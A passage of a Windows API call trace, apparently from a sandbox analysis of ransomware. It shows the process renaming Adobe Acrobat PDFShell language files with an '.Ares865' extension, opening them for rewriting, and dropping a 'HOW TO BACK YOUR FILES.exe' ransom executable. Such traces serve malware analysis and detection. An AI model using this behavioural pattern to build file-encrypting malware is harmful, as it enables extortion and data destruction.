(lpString1="ell.JPN", lpString2="Ares865") returned 1 [0153.661] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.Ares865") returned 78 [0153.661] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn.ares865"), dwFlags=0x1) returned 1 [0153.663] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300032) returned 1 [0153.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.701] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.KOR" | out: lpString1="PDFShell.KOR") returned="PDFShell.KOR" [0153.701] lstrlenW (lpString="PDFShell.KOR") returned 12 [0153.701] lstrlenW (lpString="Ares865") returned 7 [0153.701] lstrcmpiW (lpString1="ell.KOR", lpString2="Ares865") returned 1 [0153.701] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.Ares865") returned 78 [0153.701] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor.ares865"), dwFlags=0x1) returned 1 [0153.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300032) returned 1 [0153.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.743] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.NLD" | out: lpString1="PDFShell.NLD") returned="PDFShell.NLD" [0153.743] lstrlenW (lpString="PDFShell.NLD") returned 12 [0153.743] lstrlenW (lpString="Ares865") returned 7 [0153.743] lstrcmpiW (lpString1="ell.NLD", lpString2="Ares865") returned 1 [0153.743] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.Ares865") returned 78 [0153.743] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld.ares865"), dwFlags=0x1) returned 1 [0153.745] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.746] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.788] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.NOR" | out: lpString1="PDFShell.NOR") returned="PDFShell.NOR" [0153.788] lstrlenW (lpString="PDFShell.NOR") returned 12 [0153.788] lstrlenW (lpString="Ares865") returned 7 [0153.788] lstrcmpiW (lpString1="ell.NOR", lpString2="Ares865") returned 1 [0153.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.Ares865") returned 78 [0153.788] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor.ares865"), dwFlags=0x1) returned 1 [0153.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.826] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.POL" | out: lpString1="PDFShell.POL") returned="PDFShell.POL" [0153.826] lstrlenW (lpString="PDFShell.POL") returned 12 [0153.826] lstrlenW (lpString="Ares865") returned 7 [0153.826] lstrcmpiW (lpString1="ell.POL", lpString2="Ares865") returned 1 [0153.826] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.Ares865") returned 78 [0153.826] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol.ares865"), dwFlags=0x1) returned 1 [0153.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.870] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.PTB" | out: lpString1="PDFShell.PTB") returned="PDFShell.PTB" [0153.871] lstrlenW (lpString="PDFShell.PTB") returned 12 [0153.871] lstrlenW (lpString="Ares865") returned 7 [0153.871] lstrcmpiW (lpString1="ell.PTB", lpString2="Ares865") returned 1 [0153.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.Ares865") returned 78 [0153.871] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb.ares865"), dwFlags=0x1) returned 1 [0153.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.874] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301056) returned 1 [0153.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.919] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.RUM" | out: lpString1="PDFShell.RUM") returned="PDFShell.RUM" [0153.919] lstrlenW (lpString="PDFShell.RUM") returned 12 [0153.919] lstrlenW (lpString="Ares865") returned 7 [0153.919] lstrcmpiW (lpString1="ell.RUM", lpString2="Ares865") returned 1 [0153.919] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.Ares865") returned 78 [0153.920] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum.ares865"), dwFlags=0x1) returned 1 [0153.922] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.922] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.922] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.996] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.RUS" | out: lpString1="PDFShell.RUS") returned="PDFShell.RUS" [0153.996] lstrlenW (lpString="PDFShell.RUS") returned 12 [0153.996] lstrlenW (lpString="Ares865") returned 7 [0153.996] lstrcmpiW (lpString1="ell.RUS", lpString2="Ares865") returned 1 [0153.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.Ares865") returned 78 [0153.996] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus.ares865"), dwFlags=0x1) returned 1 [0154.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.035] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.SKY" | out: lpString1="PDFShell.SKY") returned="PDFShell.SKY" [0154.035] lstrlenW (lpString="PDFShell.SKY") returned 12 [0154.035] lstrlenW (lpString="Ares865") returned 7 [0154.035] lstrcmpiW (lpString1="ell.SKY", lpString2="Ares865") returned 1 [0154.035] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.Ares865") returned 78 [0154.036] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky.ares865"), dwFlags=0x1) returned 1 [0154.038] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.056] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.SLV" | out: lpString1="PDFShell.SLV") returned="PDFShell.SLV" [0154.056] lstrlenW (lpString="PDFShell.SLV") returned 12 [0154.056] lstrlenW (lpString="Ares865") returned 7 [0154.056] lstrcmpiW (lpString1="ell.SLV", lpString2="Ares865") returned 1 [0154.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.Ares865") returned 78 [0154.057] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv.ares865"), dwFlags=0x1) returned 1 [0154.059] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.059] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.077] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.SUO" | out: lpString1="PDFShell.SUO") returned="PDFShell.SUO" [0154.078] lstrlenW (lpString="PDFShell.SUO") returned 12 [0154.078] lstrlenW (lpString="Ares865") returned 7 [0154.078] lstrcmpiW (lpString1="ell.SUO", lpString2="Ares865") returned 1 [0154.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.Ares865") returned 78 [0154.078] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo.ares865"), dwFlags=0x1) returned 1 [0154.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.080] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.101] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.SVE" | out: lpString1="PDFShell.SVE") returned="PDFShell.SVE" [0154.101] lstrlenW (lpString="PDFShell.SVE") returned 12 [0154.101] lstrlenW (lpString="Ares865") returned 7 [0154.101] lstrcmpiW (lpString1="ell.SVE", lpString2="Ares865") returned 1 [0154.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.Ares865") returned 78 [0154.101] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve.ares865"), dwFlags=0x1) returned 1 [0154.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.121] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.TUR" | out: lpString1="PDFShell.TUR") returned="PDFShell.TUR" [0154.121] lstrlenW (lpString="PDFShell.TUR") returned 12 [0154.121] lstrlenW (lpString="Ares865") returned 7 [0154.121] lstrcmpiW (lpString1="ell.TUR", lpString2="Ares865") returned 1 [0154.122] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.Ares865") returned 78 [0154.122] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur.ares865"), dwFlags=0x1) returned 1 [0154.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.124] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.142] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.UKR" | out: lpString1="PDFShell.UKR") returned="PDFShell.UKR" [0154.142] lstrlenW (lpString="PDFShell.UKR") returned 12 [0154.142] lstrlenW (lpString="Ares865") returned 7 [0154.142] lstrcmpiW (lpString1="ell.UKR", lpString2="Ares865") returned 1 [0154.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.Ares865") returned 78 [0154.143] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr.ares865"), dwFlags=0x1) returned 1 [0154.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0154.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.165] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0154.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5f70 | out: hHeap=0x2b0000) returned 1 [0154.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e78c8 | out: hHeap=0x2b0000) returned 1 [0154.165] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe") returned 28 [0154.165] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0154.165] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0154.165] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0154.166] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0154.167] GetLastError () returned 0x0 [0154.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0154.167] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0154.168] CloseHandle (hObject=0x120) returned 1 [0154.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0154.168] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0154.168] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, 